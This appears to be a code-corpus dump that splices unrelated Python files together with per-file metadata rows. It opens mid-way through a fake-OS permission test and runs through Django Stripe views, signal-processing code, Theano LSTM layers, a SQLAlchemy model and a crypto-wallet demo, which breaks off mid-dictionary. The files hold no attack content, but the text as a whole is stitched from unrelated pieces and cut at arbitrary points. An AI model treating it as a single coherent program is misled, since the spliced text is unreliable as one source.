assert os.access("wx", os.W_OK)
assert os.access("wx", os.X_OK | os.W_OK)
assert not os.access("wx", os.R_OK)
assert not os.access("wx", os.X_OK | os.R_OK)
assert os.access("rx", os.X_OK)
assert os.access("rx", os.R_OK)
assert os.access("rx", os.X_OK | os.R_OK)
assert not os.access("rx", os.W_OK)
assert not os.access("rx", os.W_OK | os.R_OK)
assert os.access("rwx", os.R_OK)
assert os.access("rwx", os.X_OK)
assert os.access("rwx", os.F_OK)
assert os.access("rwx", os.R_OK | os.X_OK | os.W_OK)
assert os.access("rwx", os.X_OK | os.W_OK)
class PermissionsCase(TestCase):
def test_rmdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(uid=0, gid=0))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.rmdir("/")
def test_renaming_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser())
os.mkdir("/", mode=0o000)
with self.assertRaises(PermissionError):
os.rename("/", "lol")
def test_chmod_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0o100)
with self.assertRaises(PermissionError):
os.chmod("/", mode=0o666)
def test_chown_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.chown('/', uid=3)
def test_mkdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0)
with self.assertRaises(PermissionError):
os.mkdir("/hello")
def test_listdir_when_theres_no_permission_to_do_so(self):
os = FakeOS(user=FakeUser(gid=2, uid=2, is_sudoer=False))
os.mkdir("/", mode=0o666) # No execution allowed
with self.assertRaises(PermissionError):
os.listdir("/")
class UserAndGroupCase(TestCase):
@given(integers())
def test_gid(self, gid: int):
os = FakeOS()
os.setgid(gid)
assert os.getgid() == gid
@given(integers())
def test_uid(self, uid: int):
os = FakeOS()
os.setuid(uid)
assert os.getuid() == uid
@given(integers())
def test_egid(self, egid: int):
os = FakeOS()
os.setegid(egid)
assert os.getegid() == egid
@given(integers())
def test_euid(self, euid: int):
os = FakeOS()
os.seteuid(euid)
assert os.geteuid() == euid
| 33.403818
| 86
| 0.583656
| 22,162
| 0.974239
| 0
| 0
| 14,293
| 0.628319
| 0
| 0
| 874
| 0.038421
|
9fe6a6466ba62d142e4c8d8e39066315eacdcdb4
| 6,129
|
py
|
Python
|
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | 1
|
2020-03-02T22:26:44.000Z
|
2020-03-02T22:26:44.000Z
|
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | null | null | null |
ceed/utils.py
|
matham/ceed
|
5d32a99a33325b36dbe74d8b0a22e63abc92aab7
|
[
"MIT"
] | 2
|
2020-01-13T19:42:16.000Z
|
2020-01-27T14:58:09.000Z
|
"""Utilities
===================
Various tools used in :mod:`ceed`.
"""
import re
import pathlib
from collections import deque
from typing import List, Tuple, Any, Union
__all__ = (
'fix_name', 'update_key_if_other_key', 'collapse_list_to_counts',
'get_plugin_modules', 'CeedWithID',
)
_name_pat = re.compile('^(.+)-([0-9]+)$')
def fix_name(name, *names):
"""Fixes the name so that it is unique among the names in ``names``.
:Params:
`name`: str
A name of something
`*names`: iterables of strings
            Positional arguments, where each is an iterable of strings among
            which we ensure that the returned name is unique.
:returns:
        A string that is unique among all the ``names``, but is similar to
        ``name``. We append an integer to make it unique.
E.g.::
>>> fix_name('troll', ['toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'toll', 'foll'], ['bole', 'cole'])
'troll-2'
>>> fix_name('troll', ['troll-2', 'toll', 'foll'], ['bole', 'cole'])
'troll'
>>> fix_name('troll', ['troll', 'troll-2', 'toll', 'foll'], \
['bole', 'cole'])
'troll-3'
"""
if not any((name in n for n in names)):
return name
m = re.match(_name_pat, name)
i = 2
if m is not None:
name, i = m.groups()
i = int(i)
new_name = '{}-{}'.format(name, i)
while any((new_name in n for n in names)):
i += 1
new_name = '{}-{}'.format(name, i)
return new_name
def update_key_if_other_key(items, key, value, other_key, key_map):
"""Given a dict, or list/tuple of dicts (recursively), it goes through all
the dicts and updates the keys who match.
Specifically, if a key matches ``key``, its value matches ``value``,
there's another key named ``other_key`` in the dict, and the ``value`` of
``other_key`` is in ``key_map``, then the value of ``other_key`` is
updated to that value from ``key_map``.
"""
for item in items:
if isinstance(item, dict):
if key in item and item[key] == value and other_key in item:
item[other_key] = key_map.get(item[other_key], item[other_key])
update_key_if_other_key(
item.values(), key, value, other_key, key_map)
elif isinstance(item, (list, tuple)):
update_key_if_other_key(item, key, value, other_key, key_map)
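# Illustrative sketch of the behaviour above (the dicts, key names, and values
# here are made-up examples, not taken from ceed itself):
#   items = [{'cls': 'Stage', 'name': 'old'}, {'cls': 'Other', 'name': 'old'}]
#   update_key_if_other_key(items, 'cls', 'Stage', 'name', {'old': 'new'})
#   # only the first dict (whose 'cls' equals 'Stage') has 'name' remapped to 'new'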
def collapse_list_to_counts(values: list) -> List[Tuple[Any, int]]:
"""Converts a sequence of items to tuples of the item and count of
sequential items.
E.g.::
>>> collapse_list_to_counts([1, 1, 2, 3, 1, 1, 1, 3,])
[(1, 2), (2, 1), (3, 1), (1, 3), (3, 1)]
"""
counter = None
last_item = object()
res = []
for value in values:
if value != last_item:
if counter is not None:
res.append((last_item, counter))
last_item = value
counter = 1
else:
counter += 1
if counter is not None:
# we saw some items at least, the last was not added
res.append((last_item, counter))
return res
def get_plugin_modules(
base_package: str, root: Union[str, pathlib.Path]
) -> Tuple[List[str], List[Tuple[Tuple[str], bytes]]]:
    """Takes a package name and its corresponding root path and returns a list
    of the modules recursively within this package, as well as the source files
    in bytes.
    Only ``*.py`` (and compiled ``*.pyo``) files are considered, and although
    included with the source bytes, the ``packages`` list skips any files that
    start with an underscore (except ``__init__.py`` of course).
"""
packages = []
files = []
fifo = deque([pathlib.Path(root)])
while fifo:
directory = fifo.popleft()
relative_dir = directory.relative_to(root)
directory_mod = '.'.join((base_package,) + relative_dir.parts)
for item in directory.iterdir():
if item.is_dir():
if not item.name == '__pycache__':
fifo.append(item)
continue
if not item.is_file() or not item.name.endswith(('.py', '.pyo')):
continue
# only pick one of pyo/py
if item.suffix == '.pyo' and item.with_suffix('.py').exists():
continue
files.append(
(relative_dir.parts + (item.name, ), item.read_bytes()))
if item.name.startswith('_') and item.name != '__init__.py' \
and item.name != '__init__.pyo':
continue
name = item.name[:-3]
if name == '__init__':
package = directory_mod
else:
package = f'{directory_mod}.{name}'
packages.append(package)
return packages, files
class CeedWithID:
"""Adds :attr:`ceed_id` to the class so that any inheriting class instance
can be associated with a unique integer ID for logging purposes.
The ID is not automatically set for every object, it is manually set
when :meth:`set_ceed_id` is called. See stage/function for when it's called.
"""
ceed_id: int = 0
"""The integer id of the object.
"""
def set_ceed_id(self, min_available: int) -> int:
"""Sets the ID of this and any sub objects, each to a number equal or
greater than ``min_available`` and returns the next minimum number
available to be used.
See :attr:`~ceed.analysis.CeedDataReader.event_data` for more details.
:param min_available: The minimum number available to be used for the
ID so it is unique.
:return: The next minimum available number that can be used. Any number
larger or equal to it is free to be used.
"""
self.ceed_id = min_available
return min_available + 1
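# Illustrative sketch only (a hypothetical container class, not part of ceed):
# a parent object would typically chain the returned counter through its
# children so every object ends up with a unique id, e.g.
#   class Group(CeedWithID):
#       children = []
#       def set_ceed_id(self, min_available: int) -> int:
#           min_available = super().set_ceed_id(min_available)
#           for child in self.children:
#               min_available = child.set_ceed_id(min_available)
#           return min_available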
| 32.775401
| 81
| 0.565019
| 1,065
| 0.173764
| 0
| 0
| 0
| 0
| 0
| 0
| 3,146
| 0.513297
|
9fe8653449fbc6e6fa94b10d1d0a857bd0455ebf
| 2,341
|
py
|
Python
|
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | 1
|
2022-01-22T13:43:30.000Z
|
2022-01-22T13:43:30.000Z
|
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | null | null | null |
gumroad_clone/users/views.py
|
AlexanderTCHK/gumroad-clone
|
39654243e581b918569772e410196557f71f6591
|
[
"MIT"
] | null | null | null |
import stripe
from django.conf import settings
from django.contrib.auth import get_user_model
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.urls import reverse
from django.utils.translation import gettext_lazy as _
from django.views.generic import DetailView, RedirectView, UpdateView, TemplateView
from stripe.api_resources import account_link
User = get_user_model()
stripe.api_key = settings.STRIPE_SECRET_KEY
class UserProfileView(LoginRequiredMixin, TemplateView):
template_name = 'profile.html'
def get_context_data(self, **kwargs):
account = stripe.Account.retrieve(self.request.user.stripe_account_id)
details_submitted = account["details_submitted"]
        context = super().get_context_data(**kwargs)
        context.update({
            'details_submitted': details_submitted
        })
        return context
class UserDetailView(LoginRequiredMixin, DetailView):
model = User
slug_field = "username"
slug_url_kwarg = "username"
user_detail_view = UserDetailView.as_view()
class UserUpdateView(LoginRequiredMixin, SuccessMessageMixin, UpdateView):
model = User
fields = ["name"]
success_message = _("Information successfully updated")
def get_success_url(self):
assert (
self.request.user.is_authenticated
) # for mypy to know that the user is authenticated
return self.request.user.get_absolute_url()
def get_object(self):
return self.request.user
user_update_view = UserUpdateView.as_view()
class UserRedirectView(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
return reverse("discover")
user_redirect_view = UserRedirectView.as_view()
class StripeAccountLink(LoginRequiredMixin, RedirectView):
permanent = False
def get_redirect_url(self):
# Domain for success and cancel urls
domain = "http://" + settings.ALLOWED_HOSTS[0]
account_link = stripe.AccountLink.create(
account = self.request.user.stripe_account_id,
refresh_url = domain + reverse("stripe-account-link"),
return_url = domain + reverse("profile"),
type = "account_onboarding",
)
return account_link["url"]
| 29.2625
| 83
| 0.720632
| 1,683
| 0.718924
| 0
| 0
| 0
| 0
| 0
| 0
| 271
| 0.115762
|
9fe92dc5882b9ab766bfa49539001ca33aa51f84
| 510
|
py
|
Python
|
chapter1/quest1_4.py
|
mag6367/Coding_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | 1
|
2017-04-28T13:52:13.000Z
|
2017-04-28T13:52:13.000Z
|
chapter1/quest1_4.py
|
mag6367/Cracking_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | null | null | null |
chapter1/quest1_4.py
|
mag6367/Cracking_the_Coding_Interview_Python_Solutions
|
1d97d18d3d9732c25626e20cb3561ce4241b16e8
|
[
"MIT"
] | null | null | null |
# question 1.4 from cracking the code interview 4th ed.
'''
Write a method to decide if two strings are anagrams or not.
'''
# if we sort the two strings, anagrams will produce identical results
def areAnagram (str1, str2):
    # check if both inputs are valid strings
if not isinstance(str1, str) or not isinstance(str2, str):
return False
# first we convert the two strings into lists and sort them
newStr1 = sorted(str1)
newStr2 = sorted(str2)
# if they are anagrams, the lists should be identical
return newStr1 == newStr2
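# A quick illustrative check (the example words are arbitrary):
if __name__ == "__main__":
    print(areAnagram("listen", "silent"))  # expected: True
    print(areAnagram("hello", "world"))    # expected: False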
| 24.285714
| 60
| 0.727451
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 315
| 0.617647
|
9febad62a52cd187ba14dbd7516dbb4c9c77a4fc
| 2,516
|
py
|
Python
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 14
|
2020-02-16T15:36:31.000Z
|
2022-03-27T02:24:40.000Z
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 1
|
2020-11-23T16:16:33.000Z
|
2020-11-23T16:16:33.000Z
|
firmware/measure_magnitude.py
|
mfkiwl/OpenXcvr
|
9bea6efd03cd246f16982f0fadafed684ac5ce1c
|
[
"MIT"
] | 4
|
2021-03-29T16:55:03.000Z
|
2022-01-23T16:43:59.000Z
|
from baremetal import *
from baremetal.signed import number_of_bits_needed
from settings import Settings
from math import log, pi
from matplotlib import pyplot as plt
import numpy as np
import sys
from math import log, ceil
from numpy import log10
#settings for 100KS/s
# hang attack decay
# fast 10000(100ms) 4(1ms) 10(62.5ms)
# med 25000(250ms) 4(1ms) 12(250ms)
# slow 100000(1s) 4(1ms) 13(500ms)
# long 200000(2s) 4(1ms) 15(2s)
def measure_magnitude(clk, audio, audio_stb, agc_speed, reset=0):
attack_factor = 4
max_factor = 15
decay_factor = Signed(5).select(agc_speed, 9, 11, 12, 13)
hang = Unsigned(19).select(agc_speed, 5000, 12500, 50000, 100000)
#use a leaky max hold
audio_bits = audio.subtype.bits
#add extra bits for decay calculation
audio = audio.resize(audio_bits+max_factor) << max_factor
max_hold = audio.subtype.register(clk, init=0, en=audio_stb)
counter = Unsigned(19).register(clk, en=audio_stb, init=0)
#if signal is greater than magnitude
attack = (audio > max_hold)
attack_new_val = max_hold + ((audio - max_hold) >> attack_factor)
decay_new_val = max_hold - (max_hold >> decay_factor)
hold_expired = counter == 0
counter.d(counter.subtype.select(attack, counter.subtype.select(hold_expired, counter - 1, 0), hang-1))
max_hold_new_val = audio.subtype.select(attack, max_hold.subtype.select(hold_expired, max_hold, decay_new_val), attack_new_val)
max_hold.d(audio.subtype.select(reset, max_hold_new_val, 0))
#remove extra bits (except one to allow for addition)
max_hold = (max_hold >> max_factor).resize(audio_bits)
return max_hold
if __name__ == "__main__" and "sim" in sys.argv:
settings = Settings()
settings.agc_frame_size = 100
settings.agc_frames = 4
clk = Clock("clk")
data_in = Signed(16).input("data_in")
stb_in = Boolean().input("stb_in")
magnitude = measure_magnitude(clk, data_in, stb_in, 0, 0)
stimulus = []
for i in range(1000):
stimulus.append(100)
for i in range(20000):
stimulus.append(0)
response = []
#simulate
clk.initialise()
i = 0
for data in stimulus:
data_in.set(data)
for i in range(2):
stb_in.set(i==1)
if i==1:
response.append(magnitude.get())
clk.tick()
i+=1
response = np.array(response)
plt.plot(response)
plt.plot(stimulus)
plt.show()
| 30.313253
| 131
| 0.65779
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 423
| 0.168124
|
9fec2b87298b7ce1d8fa49d924c18e361c3fbd3b
| 737
|
py
|
Python
|
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | null | null | null |
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | 2
|
2018-05-21T09:39:00.000Z
|
2018-05-27T15:59:15.000Z
|
chpt6/Palindrome.py
|
GDG-Buea/learn-python
|
9dfe8caa4b57489cf4249bf7e64856062a0b93c2
|
[
"Apache-2.0"
] | 2
|
2018-05-19T14:59:56.000Z
|
2018-05-19T15:25:48.000Z
|
# This program prompts a user to enter an integer and reports whether the integer is a palindrome or not
# A number is a palindrome if its reversal is the same as itself.
def reverse(number):
    # reverse the digits of a non-negative integer, e.g. 1234 -> 4321
    reversed_number = 0
    while number > 0:
        reversed_number = reversed_number * 10 + number % 10
        number //= 10
    return reversed_number
def is_palindrome(number):
value = number
if value == reverse(number):
return 'This is a palindrome'
else:
return 'This is not a palindrome'
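# Illustrative calls (example inputs only):
#   is_palindrome(1221) -> 'This is a palindrome'
#   is_palindrome(1234) -> 'This is not a palindrome'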
def main():
    number_test = int(input("Enter a four digit number to test if it's a palindrome: "))
print(is_palindrome(number_test))
main()
| 23.03125
| 104
| 0.679783
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 276
| 0.374491
|
9fec53592de30b9286e20a972b9d6a2e491fec66
| 89
|
py
|
Python
|
refugee/apps.py
|
poiedk/refugge_app
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | 1
|
2020-06-07T15:48:34.000Z
|
2020-06-07T15:48:34.000Z
|
refugee/apps.py
|
poiedk/refuggeapp
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | 1
|
2020-06-05T20:15:54.000Z
|
2020-06-05T20:15:54.000Z
|
refugee/apps.py
|
poiedk/refuggeapp
|
95299005a3fac1ae92cf700d8d52e884c1d17033
|
[
"MIT"
] | null | null | null |
from django.apps import AppConfig
class RefugeeConfig(AppConfig):
name = 'refugee'
| 14.833333
| 33
| 0.752809
| 52
| 0.58427
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.101124
|
9fedd39a8f50939e9c4f94bb47bef7f75ae894a9
| 8,113
|
py
|
Python
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 122
|
2015-07-24T09:29:06.000Z
|
2022-02-22T02:51:00.000Z
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 4
|
2015-07-27T04:37:11.000Z
|
2020-04-04T08:05:00.000Z
|
mozi/layers/recurrent.py
|
hycis/Mozi
|
7f2eccbe3169c10d231e07edf8bc650039fa4eb2
|
[
"MIT"
] | 27
|
2015-07-24T12:59:35.000Z
|
2020-04-14T00:21:43.000Z
|
from mozi.utils.theano_utils import shared_zeros, alloc_zeros_matrix, shared_ones
from mozi.layers.template import Template
from mozi.weight_init import OrthogonalWeight, GaussianWeight, Identity
import theano.tensor as T
import theano
class LSTM(Template):
def __init__(self, input_dim, output_dim, truncate_gradient=-1, return_sequences=True,
weight_init=OrthogonalWeight(), inner_init=GaussianWeight(mean=0, std=0.1)):
self.input_dim = input_dim
self.output_dim = output_dim
self.truncate_gradient = truncate_gradient
self.return_sequences = return_sequences
self.W_i = weight_init((self.input_dim, self.output_dim))
self.U_i = inner_init((self.output_dim, self.output_dim))
self.b_i = shared_zeros((self.output_dim), name='b_i')
self.W_f = weight_init((self.input_dim, self.output_dim))
self.U_f = inner_init((self.output_dim, self.output_dim))
self.b_f = shared_ones((self.output_dim), name='b_f')
self.W_c = weight_init((self.input_dim, self.output_dim))
self.U_c = inner_init((self.output_dim, self.output_dim))
self.b_c = shared_zeros((self.output_dim), name='b_c')
self.W_o = weight_init((self.input_dim, self.output_dim))
self.U_o = inner_init((self.output_dim, self.output_dim))
self.b_o = shared_zeros((self.output_dim), name='b_o')
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
def _step(self, xi_t, xf_t, xo_t, xc_t,
h_tm1, c_tm1, u_i, u_f, u_o, u_c):
        # Standard LSTM cell: sigmoid gates plus a tanh candidate, computed from
        # the pre-projected inputs (xi_t, xf_t, xo_t, xc_t) and the previous state.
        i_t = T.nnet.sigmoid(xi_t + T.dot(h_tm1, u_i))  # input gate
        f_t = T.nnet.sigmoid(xf_t + T.dot(h_tm1, u_f))  # forget gate
        o_t = T.nnet.sigmoid(xo_t + T.dot(h_tm1, u_o))  # output gate
        g_t = T.tanh(xc_t + T.dot(h_tm1, u_c))  # candidate cell update
        c_t = f_t * c_tm1 + i_t * g_t  # new cell state
        h_t = o_t * T.tanh(c_t)  # new hidden state
        return h_t, c_t
def _train_fprop(self, state_below):
X = state_below.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
[outputs, memories], updates = theano.scan(
self._step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c],
truncate_gradient=self.truncate_gradient)
if self.return_sequences:
return outputs.dimshuffle((1, 0, 2))
return outputs[-1]
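# Illustrative note (the dimensions below are arbitrary assumptions): a layer
# built as LSTM(input_dim=128, output_dim=64, return_sequences=True) maps a
# (batch, time, 128) input to (batch, time, 64); with return_sequences=False
# only the last time step, shaped (batch, 64), is returned.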
class BiLSTM(Template):
'''
    Bidirectional LSTM: runs a forward and a backward LSTM over the input and
    combines their outputs by summation or concatenation.
'''
def __init__(self, input_dim, output_dim, weight_init=OrthogonalWeight(),
inner_init=GaussianWeight(mean=0, std=0.1), truncate_gradient=-1,
output_mode='concat', return_sequences=False, return_idx=-1):
self.input_dim = input_dim
self.output_dim = output_dim
self.truncate_gradient = truncate_gradient
        self.output_mode = output_mode  # output_mode is either 'sum' or 'concat'
self.return_sequences = return_sequences
self.return_idx = return_idx
# forward weights
self.W_i = weight_init((self.input_dim, self.output_dim))
self.U_i = inner_init((self.output_dim, self.output_dim))
self.b_i = shared_zeros((self.output_dim), name='b_i')
self.W_f = weight_init((self.input_dim, self.output_dim))
self.U_f = inner_init((self.output_dim, self.output_dim))
self.b_f = shared_ones((self.output_dim), name='b_f')
self.W_c = weight_init((self.input_dim, self.output_dim))
self.U_c = inner_init((self.output_dim, self.output_dim))
self.b_c = shared_zeros((self.output_dim), name='b_c')
self.W_o = weight_init((self.input_dim, self.output_dim))
self.U_o = inner_init((self.output_dim, self.output_dim))
self.b_o = shared_zeros((self.output_dim), name='b_o')
# backward weights
self.Wb_i = weight_init((self.input_dim, self.output_dim))
self.Ub_i = inner_init((self.output_dim, self.output_dim))
self.bb_i = shared_zeros((self.output_dim), name='bb_i')
self.Wb_f = weight_init((self.input_dim, self.output_dim))
self.Ub_f = inner_init((self.output_dim, self.output_dim))
self.bb_f = shared_ones((self.output_dim), name='bb_f')
self.Wb_c = weight_init((self.input_dim, self.output_dim))
self.Ub_c = inner_init((self.output_dim, self.output_dim))
self.bb_c = shared_zeros((self.output_dim), name='bb_c')
self.Wb_o = weight_init((self.input_dim, self.output_dim))
self.Ub_o = inner_init((self.output_dim, self.output_dim))
self.bb_o = shared_zeros((self.output_dim), name='bb_o')
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
self.Wb_i, self.Ub_i, self.bb_i,
self.Wb_c, self.Ub_c, self.bb_c,
self.Wb_f, self.Ub_f, self.bb_f,
self.Wb_o, self.Ub_o, self.bb_o,
]
def _forward_step(self,
xi_t, xf_t, xo_t, xc_t,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = T.nnet.sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = T.nnet.sigmoid(xf_t + T.dot(h_tm1, u_f))
o_t = T.nnet.sigmoid(xo_t + T.dot(h_tm1, u_o))
g_t = T.tanh(xc_t + T.dot(h_tm1, u_c))
c_t = f_t * c_tm1 + i_t * g_t
h_t = o_t * T.tanh(c_t)
return h_t, c_t
def get_forward_output(self, state_below):
X = state_below.dimshuffle((1,0,2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
[outputs, memories], updates = theano.scan(
self._forward_step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c],
truncate_gradient=self.truncate_gradient
)
return outputs.dimshuffle((1,0,2))
def get_backward_output(self, state_below):
X = state_below.dimshuffle((1,0,2))
xi = T.dot(X, self.Wb_i) + self.bb_i
xf = T.dot(X, self.Wb_f) + self.bb_f
xc = T.dot(X, self.Wb_c) + self.bb_c
xo = T.dot(X, self.Wb_o) + self.bb_o
[outputs, memories], updates = theano.scan(
self._forward_step,
sequences=[xi, xf, xo, xc],
outputs_info=[
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1),
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.output_dim), 1)
],
non_sequences=[self.Ub_i, self.Ub_f, self.Ub_o, self.Ub_c],
go_backwards = True,
truncate_gradient=self.truncate_gradient
)
return outputs.dimshuffle((1,0,2))
def _train_fprop(self, state_below):
forward = self.get_forward_output(state_below)
backward = self.get_backward_output(state_below)
if self.output_mode == 'sum':
output = forward + backward
elif self.output_mode == 'concat':
output = T.concatenate([forward, backward], axis=2)
else:
raise Exception('output mode is not sum or concat')
if self.return_sequences==False:
return output[:,self.return_idx,:]
elif self.return_sequences==True:
return output
else:
            raise Exception('return_sequences must be either True or False')
| 38.450237
| 92
| 0.609762
| 7,870
| 0.970048
| 0
| 0
| 0
| 0
| 0
| 0
| 274
| 0.033773
|
9ff112f147fc3eea03cddc2ce893a7da503429c2
| 1,045
|
py
|
Python
|
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
emilia/modules/sql/admin_sql.py
|
masterisira/ELIZA_OF-master
|
02a7dbf48e4a3d4ee0981e6a074529ab1497aafe
|
[
"Unlicense"
] | null | null | null |
import threading
from typing import Union
from sqlalchemy import Column, Integer, String, Boolean
from emilia.modules.sql import SESSION, BASE
class PermanentPin(BASE):
__tablename__ = "permanent_pin"
chat_id = Column(String(14), primary_key=True)
message_id = Column(Integer)
def __init__(self, chat_id):
self.chat_id = str(chat_id)
def __repr__(self):
return "<Permanent pin for ({})>".format(self.chat_id)
PermanentPin.__table__.create(checkfirst=True)
PERMPIN_LOCK = threading.RLock()
def set_permapin(chat_id, message_id):
with PERMPIN_LOCK:
permpin = SESSION.query(PermanentPin).get(str(chat_id))
if not permpin:
permpin = PermanentPin(chat_id)
permpin.message_id = int(message_id)
SESSION.add(permpin)
SESSION.commit()
def get_permapin(chat_id):
try:
permapin = SESSION.query(PermanentPin).get(str(chat_id))
if permapin:
return permapin.message_id
return 0
finally:
SESSION.close()
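# Illustrative usage sketch (the chat/message ids are made up; not executed on
# import since it would touch the database):
#   set_permapin(-1001234567890, 42)   # remember message 42 as the permanent pin
#   get_permapin(-1001234567890)       # -> 42, or 0 if nothing is stored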
| 24.302326
| 64
| 0.677512
| 303
| 0.289952
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.039234
|
9ff556e97733100f33310335bf44e3b09364ba15
| 3,985
|
py
|
Python
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | 5
|
2018-06-05T14:28:32.000Z
|
2020-10-28T14:30:03.000Z
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | 5
|
2018-06-04T09:08:48.000Z
|
2018-06-29T17:46:58.000Z
|
demo.py
|
danuker/piggies
|
215495689122fc14f9deb40587aaf2f34f526120
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Before you can use Piggies, you need actual wallets.
# To fetch and extract the wallet clients, and create wallet files:
# mkdir wallets && cd wallets
#
# wget https://download.electrum.org/3.1.3/Electrum-3.1.3.tar.gz
# tar xvzf Electrum-3.1.3.tar.gz
# cd Electrum-3.1.3/
# mkdir -p ../../datastores/BTC/wallets/
# ./electrum create -w ../../datastores/BTC/wallets/your_BTC_wallet_name_here.dat
# cd ..
#
# wget https://dlsrc.getmonero.org/cli/monero-linux-x64-v0.12.2.0.tar.bz2
# tar xvjf monero-linux-x64-v0.12.2.0.tar.bz2
# cd monero-v0.12.2.0/
# mkdir -p ../../datastores/XMR/wallets/
# ./monero-wallet-cli --generate-new-wallet=../../datastores/XMR/wallets/your_XMR_wallet_name_here.dat
# cd ../..
#
# # The next command will sync the Monero blockchain.
# # It took about 48h (+/- 24h) on an SSD, on 2018-06-06.
# # An HDD (not SSD) would take about 4.7 times longer!!!
# # Also, make sure you are using a wired network connection, not Wi-Fi (which is slower)!
#
# # Required disk space: Multiply the last reported size here by 1.3:
# # https://moneroblocks.info/stats/blockchain-growth
# # Right now, that results in 52932.49 MB (51.69 GB)
# wallets/monero-v0.12.2.0/monerod --data-dir datastores/XMR --rpc-bind-port=37779
# cd ..
# wget https://releases.parity.io/v1.11.4/x86_64-unknown-debian-gnu/parity_1.11.4_debian_amd64.deb
# sudo dpkg -i parity_1.11.4_debian_amd64.deb
# parity account new -d datastores/ETH/
#
# # The Parity wallet also takes a while to sync (around 12h or so, as of 2018-06-28).
# # Using the CLI options in PiggyETH, the blockchain without ancient blocks only takes up ~24GB.
# # Check
# ./demo
import logging
from decimal import Decimal
from piggies import MasterPiggy
logger = logging.getLogger('piggy_logs')
# Requested piggy settings
piggy_settings = {
'BTC': {
'wallet_bin_path': 'wallets/Electrum-3.1.3/electrum',
'datastore_path': 'datastores/BTC',
'wallet_filename': 'your_BTC_wallet_name_here.dat',
'wallet_password': 'your_BTC_password_here',
'rpcuser':'your_BTC_RPC_username',
'rpcpassword': 'your_BTC_RPC_password',
'rpcport': 37778
},
'XMR': {
'daemon_bin_path': 'wallets/monero-v0.12.2.0/monerod',
